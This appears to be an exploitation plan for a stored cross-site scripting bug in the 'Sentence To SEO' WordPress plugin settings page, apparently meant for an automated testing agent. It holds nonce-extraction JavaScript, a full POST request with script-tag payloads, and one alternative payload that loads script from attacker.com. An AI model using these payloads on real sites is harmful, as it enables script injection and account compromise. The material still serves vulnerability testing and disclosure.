Sentence To SEO (keywords, description and tags) <= 1.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via 'Permanent keywords' Field

1. Vulnerability Summary

The Sentence To SEO (keywords, description and tags) plugin (version <= 1.0) contains a Stored Cross-Site Scripting (XSS) vulnerability. The flaw exists in how the plugin handles the 'Permanent keywords' setting.

Specifically:

• Input: The plugin captures user input using filter_input_array(INPUT_POST). Since FILTER_DEFAULT is applied (the default behavior of this function), no HTML sanitization occurs.
• Storage: This raw input is stored in the WordPress options table via update_option().
• Output: On the plugin's settings page, the stored value is retrieved and echoed directly into a <textarea> element using PHP short echo tags (<?= ?>) without any escaping (such as esc_textarea() or esc_html()).

An attacker with Administrator privileges can inject a payload like </textarea><script>alert(1)</script>, which breaks out of the textarea context and executes arbitrary JavaScript whenever the settings page is loaded.

2. Attack Vector Analysis

• Vulnerable Endpoint: WordPress Admin Dashboard, specifically the plugin's settings page.
• Endpoint URL: /wp-admin/options-general.php?page=sentence-to-seo (inferred slug).
• HTTP Parameter: The name attribute of the 'Permanent keywords' field (likely permanent_keywords or sts_permanent_keywords).
• Authentication Level: Administrator (or any user with manage_options capability).
• Preconditions: The plugin must be active.

3. Code Flow (Inferred)

1. Entry Point (Form Display):

   • User navigates to admin.php?page=sentence-to-seo.
   • Plugin calls a function registered via add_options_page() or add_menu_page().
   • The view file/function executes:
     $keywords = get_option('sentence_to_seo_permanent_keywords');
echo '<textarea name="permanent_keywords">' . $keywords . '</textarea>'; (Actual code uses <?= ?>).

2. Submission (The Sink):

   • User clicks "Save".
   • A handler (likely hooked to admin_init or checking $_POST in the menu callback) runs:
     $post_data = filter_input_array(INPUT_POST);
update_option('sentence_to_seo_permanent_keywords', $post_data['permanent_keywords']);

3. Trigger:

   • Any Administrator visits the settings page.
   • The unsanitized payload is echoed into the DOM.

4. Nonce Acquisition Strategy

Since this is an Authenticated (Admin) vulnerability, the exploit requires a valid WordPress nonce to bypass CSRF protections typically found on settings pages.

1. Shortcode Identification: Not applicable here, as the vulnerability is on the admin settings page.
2. Strategy:
   • Log in as the Administrator.
   • Navigate to the plugin settings page: /wp-admin/options-general.php?page=sentence-to-seo.
   • Use browser_eval to extract the nonce from the form. WordPress standard settings pages use _wpnonce.
   • JavaScript for Extraction:

     document.querySelector('input[name="_wpnonce"]')?.value || 
     document.querySelector('input[name="sentence_to_seo_nonce"]')?.value
     

3. Bypass Check: If the plugin does not use check_admin_referer() or check_ajax_referer(), the nonce may not be required. However, for a standard settings page, one is likely present.

5. Exploitation Strategy

1. Login: Use the provided Administrator credentials.
2. Discovery: Navigate to the admin panel and find the "Sentence To SEO" menu item to confirm the exact URL and field names.
3. Payload:
   </textarea><script>alert(window.origin);</script>
4. Submission (Request):
   • Method: POST
   • URL: /wp-admin/options-general.php?page=sentence-to-seo (or the action attribute of the form).
   • Headers: Content-Type: application/x-www-form-urlencoded
   • Body:

     _wpnonce=[NONCE_EXTRACTED]&
     action=update& (or specific plugin action)
     permanent_keywords=</textarea><script>alert(document.domain)</script>&
     submit=Save Changes
     

5. Trigger: Navigate back to the settings page.

6. Test Data Setup

1. Ensure the plugin sentence-to-seo is installed and activated.
2. Create an Administrator user (if not already present).
3. No specific posts or shortcodes are needed, as the sink is within the plugin's own administrative interface.

7. Expected Results

• After sending the POST request, the database option sentence_to_seo_permanent_keywords (or similar) will contain the literal string </textarea><script>alert(document.domain)</script>.
• When the Administrator navigates to the settings page, the browser will render:

  <textarea>... </textarea><script>alert(document.domain)</script> ...</textarea>
  

• An alert box showing the domain will appear.

8. Verification Steps

1. WP-CLI Verification:
   Check the value stored in the options table:

   wp option get sentence_to_seo_permanent_keywords
   

   (Note: Use the actual option name discovered during the flow analysis).
2. Source Code Check:
   Use the http_request tool to GET the settings page and check if the payload is present in the response body without HTML entities:

   # Look for the unescaped script tag
   grep "</textarea><script>" 
   

9. Alternative Approaches

• If options.php is used: If the plugin uses the standard register_setting() API, the POST request should be sent to /wp-admin/options.php with the parameter option_page set to the registered group name.
• Blind XSS: If the "Permanent keywords" are also rendered on the frontend (e.g., in <meta name="keywords">), the payload should be modified to work within a content attribute:
  • Payload: "><script src="http://attacker.com/x.js"></script>
  • Verification: Check the site's homepage source for the injected <meta> tag.
• Different Sinks: Check if "Permanent description" or "Permanent tags" fields follow the same vulnerable pattern. (High probability they do).